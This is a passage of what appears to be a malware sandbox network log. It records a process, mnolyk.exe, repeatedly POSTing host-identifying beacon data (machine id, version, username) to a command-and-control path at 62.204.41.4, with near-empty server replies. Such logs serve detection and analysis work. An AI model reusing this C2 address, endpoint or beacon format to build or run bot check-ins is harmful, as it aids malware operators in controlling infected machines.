                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:12.730153084 CET | 598 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      484 | 192.168.2.7 | 50179 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:12.913891077 CET | 599 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:12.977729082 CET | 599 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:12 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      485 | 192.168.2.7 | 50180 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:13.154966116 CET | 600 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:13.220128059 CET | 600 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      486 | 192.168.2.7 | 50181 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:13.403024912 CET | 601 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:13.468801975 CET | 601 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      487 | 192.168.2.7 | 50182 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:13.649408102 CET | 602 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:13.712430954 CET | 602 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      488 | 192.168.2.7 | 50183 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:13.886210918 CET | 603 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:13.950521946 CET | 603 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      489 | 192.168.2.7 | 50184 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:14.118143082 CET | 604 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:14.182687998 CET | 604 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      49 | 192.168.2.7 | 49743 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:13.457751036 CET | 153 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:13.521526098 CET | 155 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:13 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      490 | 192.168.2.7 | 50185 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:14.360321999 CET | 605 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:14.423168898 CET | 605 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      491 | 192.168.2.7 | 50186 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:14.607278109 CET | 606 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:14.671169043 CET | 606 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      492 | 192.168.2.7 | 50187 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:14.862061024 CET | 607 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:14.928833008 CET | 607 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:14 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      493 | 192.168.2.7 | 50188 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:15.102933884 CET | 608 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:15.170551062 CET | 608 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      494 | 192.168.2.7 | 50189 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:15.358032942 CET | 609 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:15.420347929 CET | 609 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      495 | 192.168.2.7 | 50190 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:15.591789961 CET | 610 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:15.653491974 CET | 610 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      496 | 192.168.2.7 | 50191 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:15.842998981 CET | 611 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:15.951698065 CET | 611 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:15 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      497 | 192.168.2.7 | 50192 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:16.124887943 CET | 612 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:16.190716982 CET | 612 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      498 | 192.168.2.7 | 50193 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:16.370707989 CET | 613 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:16.436515093 CET | 613 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      499 | 192.168.2.7 | 50194 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:09:16.621524096 CET | 614 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:09:16.685125113 CET | 614 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:09:16 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                      5 | 192.168.2.7 | 49699 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                      Timestamp | kBytes transferred | Direction | Data
                                                                      Feb 7, 2023 23:07:02.789716005 CET | 109 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      Host: 62.204.41.4
                                                                      Content-Length: 91
                                                                      Cache-Control: no-cache
                                                                      Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 33 32 30 39 34 36 26 75 6e 3d 66 72 6f 6e 74 64 65 73 6b 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                      Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=320946&un=user&dm=&av=13&lv=0&og=1
                                                                      Feb 7, 2023 23:07:02.853396893 CET | 109 | IN | HTTP/1.1 200 OK
                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                      Date: Tue, 07 Feb 2023 22:07:02 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: keep-alive
                                                                      Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                      Data Ascii: 6<c><d>0


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
